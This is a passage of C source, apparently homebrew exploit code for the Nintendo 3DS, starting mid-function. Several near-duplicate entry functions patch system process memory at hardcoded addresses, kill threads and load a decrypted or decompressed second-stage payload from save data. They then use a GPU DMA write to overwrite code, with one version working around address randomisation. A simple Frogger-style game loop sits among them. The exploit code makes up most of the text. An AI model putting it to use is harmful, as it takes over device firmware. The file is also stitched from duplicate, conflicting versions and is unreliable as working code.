Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
// drawString(CN_TOPFBADR1,"ninjhaxx",0,0);
// drawString(CN_TOPFBADR2,"ninjhaxx",0,0);
Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
int line=10;
Result ret;
Handle* addressArbiterHandle=(Handle*)0x334960;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002AED20;
Handle** dspHandle=(Handle**)0x334EFC;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr
//patch waitSyncN
patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F);
patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13);
patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E);
// patchMem(gspHandle, computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52);
//patch arbitrateAddress
patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40);
//wake threads
svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0);
svc_signalEvent(((Handle*)0x3480d0)[2]);
s32 out; svc_releaseSemaphore(&out, *(Handle*)0x357490, 1);
//kill thread5 without panicking the kernel...
*(u8*)0x359935=0x00;
svc_sleepThread(0x10000000);
//load secondary payload
u32 secondaryPayloadSize;
{
Result ret;
Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR;
FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}};
//write secondary payload file
Handle fileHandle;
ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE);
if(ret)*(u32*)NULL=0xC0DF0002;
ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14300000, 0x00011000);
if(ret)*(u32*)NULL=0xC0DF0003;
ret=_FSFILE_Close(fileHandle);
if(ret)*(u32*)NULL=0xC0DF0004;
}
//decompress it
{
lzss_decompress((u8*)0x14300000, secondaryPayloadSize, (u8*)0x14100000, lzss_get_decompressed_size((u8*)0x14300000, secondaryPayloadSize));
}
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000);
doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000);
svc_sleepThread(0x3B9ACA00);
// //close thread handles
// ret=svc_closeHandle(*((Handle*)0x359938));
// ret=svc_closeHandle(*((Handle*)0x34FEA4));
// ret=svc_closeHandle(*((Handle*)0x356274));
// ret=svc_closeHandle(*((Handle*)0x334730));
// ret=svc_closeHandle(*((Handle*)0x334F64));
void (*reset)(int size)=(void*)CN_3DSX_LOADADR;
reset(0);
while(1);
return 0;
}
int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
paintScreen(0x00,0x00,0x00);
// drawString((u8*)CN_TOPFBADR1,"ninjhaxx",0,0);
// drawString((u8*)CN_TOPFBADR2,"ninjhaxx",0,0);
Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
int line=10;
Result ret;
Handle* addressArbiterHandle=(Handle*)0x003414B0;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78;
Handle** dspHandle=(Handle**)0x341A4C;
_DSP_UnloadComponent(*dspHandle);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr
//patch waitSyncN
patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41);
patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45);
patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A);
// patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44);
// patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31);
//patch arbitrateAddress
patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C);
//wake threads
svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0);
svc_signalEvent(((Handle*)0x354ba8)[2]);
s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK !
//kill thread5 without panicking the kernel...
*(u8*)(0x3664D8+0xd)=0x00;
//load secondary payload
u32 secondaryPayloadSize;
{
Result ret;
Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR;
FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}};
//read secondary payload file
Handle fileHandle;
ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE);
if(ret)*(u32*)NULL=0xC0DF0002;
ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14100000, 0x00011000);
if(ret)*(u32*)NULL=0xC0DF0003;
ret=_FSFILE_Close(fileHandle);
if(ret)*(u32*)NULL=0xC0DF0004;
}
//decrypt it
{
Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A5900;
Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A5F48;
blowfishKeyScheduler((u32*)0x14200000);
blowfishDecrypt((u32*)0x14200000, (u32*)0x14100000, (u32*)0x14100000, secondaryPayloadSize);
}
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000);
doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000A000);
svc_sleepThread(0x3B9ACA00);
void (*reset)(int size)=(void*)CN_3DSX_LOADADR;
reset(0);
while(1);
return 0;
}
int main()
{
initSrv();
aptInit(APPID_APPLICATION);
gspGpuInit();
hidInit(NULL);
Handle fsuHandle;
srv_getServiceHandle(NULL, &fsuHandle, "fs:USER");
FSUSER_Initialize(fsuHandle);
aptSetupEventHandler();
init_map();
int i;
int j;
int p=4;
int d=0;
int q;
int frogx = 0;
int frogy = 0;
int carx[6][9];
int logx[5][6];
// Cant use rand.
//for(d=1;d<6;d++){
// while(p>4){
// p = rand();
// }
// carx[d]=26+p;
for(d=0;d<8;d++){
carx[0][d]=26;
if(d<5){
logx[0][d]=26;
}
d++;
}
for(d=1;d<8;d++){
if(d<5){
logx[0][d]=0;
}
carx[0][d]=0;
d++;
}
for(q=0;q<8;q++){
for(d=1; d<6; d++){
if(q<5){
if(d<5){
logx[d][q]=26+p+6;
}
}
carx[d][q]=26+p +6;
p=p+6;
}
p=0;
q++;
}
p= 0;
for(q=1;q<8;q++){
for(d=1;d<5;d++){
if(q<5){
if(d<5){
logx[d][q] = p-6;
}
}
carx[d][q]=p-6;
p=p-6;
}
p=0;
q++;
}
while(!aptGetStatus()){
u32 PAD=hidSharedMem[7];
if (PAD == BUTTON_UP){
frogy+= 1;
}
else if (PAD == BUTTON_DOWN){
frogy+= -1;
}
else if (PAD == BUTTON_LEFT){
frogx+= -1;
}
else if (PAD == BUTTON_RIGHT){
frogx+=1;
}
u32 regData=PAD|0x01000000;
init_map();
for(i=0;i<6;i++){
for(j=0;j<8;j++){
draw_car(carx[i][j],15+j*15);
if(i<5){
if(j<5){
draw_logs(logx[i][j],150+j*15);
}
}
}
}
draw_frog(frogx,frogy);
//Checks Colition
for(i=0;i<6;i++){
for(j=0;j<8;j++){
if(frogy==j+1){
if(frogx==carx[i][j]){
frogy =0;
frogx =0;
}
}
}
}
//Checks if frog in poodle
if(frogy >9){
for(i=0;i<5;i++){
for(j=0;j<5;j++){
if(frogy==j+10){
if(frogx==logx[i][j] || frogx==logx[i][j]+1 || frogx==logx[i][j]+2){
frogx= frogx -1;
}
else{
frogx =0;
frogy =0;
}
}
}
}
}
//reinitialize the cars :D
// Cant use f*****g rand
//for(p=0;p<6;p++){
// if(carx[p]==0){
// d=5;
// while(d>4){
// d = rand();
// }
// carx[p]= 26+d;
// }
// else {
// carx[p]=carx[p]-1;
// }
//}
for(i=0;i<6;i++){
for(j=0;j<9;j=j+2){
if(i<5){
if(j<5){
if(logx[i][j]==0){
logx[i][j]=26;
}
else{
logx[i][j]=logx[i][j]-1;
}
}
}
if(carx[i][j]==0){
carx[i][j] =26;
}
else{
carx[i][j]=carx[i][j]-1;
}
}
}
for(i=0;i<6;i++){
for(j=1;j<9;j=j+2){
if(i<5){
if(j<5){
if(logx[i][j]==26){
logx[i][j]=0;
}
else{
logx[i][j]=logx[i][j]+1;
}
}
}
if(carx[i][j]==26){
carx[i][j]=0;
}
else{
carx[i][j]= carx[i][j]+1;
}
}
}
copyBuffer();
swapBuffers();
GSPGPU_WriteHWRegs(NULL, 0x202A04, ®Data, 4);
svc_sleepThread(220000000);
}
svc_closeHandle(fsuHandle);
hidExit();
gspGpuInit();
aptExit();
svc_exitProcess();
return 0;
}
int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
// drawString(CN_TOPFBADR1,"ninjhaxx",0,0);
// drawString(CN_TOPFBADR2,"ninjhaxx",0,0);
Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
int line=10;
Result ret;
#ifdef CN_WEST
Handle* addressArbiterHandle=(Handle*)0x334960;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002AED20;
Handle** dspHandle=(Handle**)0x334EFC;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr
// //patch waitSyncN
// patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F);
// patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13);
// patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E);
// // patchMem(gspHandle, computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52);
// //patch arbitrateAddress
// patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40);
// //wake threads
// svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0);
// svc_signalEvent(((Handle*)0x3480d0)[2]);
// s32 out; svc_releaseSemaphore(&out, *(Handle*)0x357490, 1);
//kill thread5 without panicking the kernel...
*(u8*)0x359935=0x00;
#else
Handle* addressArbiterHandle=(Handle*)0x003414B0;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002B8B24;
Handle** dspHandle=(Handle**)0x341A4C;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr
// //patch waitSyncN
// patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41);
// patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45);
// patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A);
// // patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44);
// // patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31);
// //patch arbitrateAddress
// patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C);
// //wake threads
// svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0);
// svc_signalEvent(((Handle*)0x354ba8)[2]);
// s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK !
//kill thread5 without panicking the kernel...
*(u8*)(0x3664D8+0xd)=0x00;
#endif
// everything else is common
svc_sleepThread(0x10000000);
//load secondary payload
u32 secondaryPayloadSize;
{
Result ret;
Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR;
FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}};
//write secondary payload file
Handle fileHandle;
ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE);
if(ret)*(u32*)NULL=0xC0DF0002;
ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14300000, 0x00011000);
if(ret)*(u32*)NULL=0xC0DF0003;
ret=_FSFILE_Close(fileHandle);
if(ret)*(u32*)NULL=0xC0DF0004;
}
#ifndef QRINSTALLER
//decompress it
{
lzss_decompress((u8*)0x14300000, secondaryPayloadSize, (u8*)0x14100000, lzss_get_decompressed_size((u8*)0x14300000, secondaryPayloadSize));
}
#else
memcpy((u8*)0x14100000, (u8*)0x14300000, secondaryPayloadSize);
#endif
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000);
// doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000);
// in order to bypass paslr we have to search for individual pages to overwrite...
int i, j;
int k = 0;
for(i = 0; i < CN_CODEBIN_SIZE && k < 0xC; i += 0x1000)
{
for(j = 0; j < 0x0000C000; j += 0x1000)
{
if(!memcmp((void*)(CN_RANDCODEBIN_COPY_BASE + i), (void*)(CN_3DSX_LOADADR + j), 0x20))
{
doGspwn((u32*)(0x14100000 + j), (u32*)(CN_RANDCODEBIN_BASE + i), 0x00001000);
svc_sleepThread(10 * 1000 * 1000);
k++;
break;
}
}
}
svc_sleepThread(0x3B9ACA00);
void (*reset)(int size)=(void*)CN_3DSX_LOADADR;
reset(0);
while(1);
return 0;
}
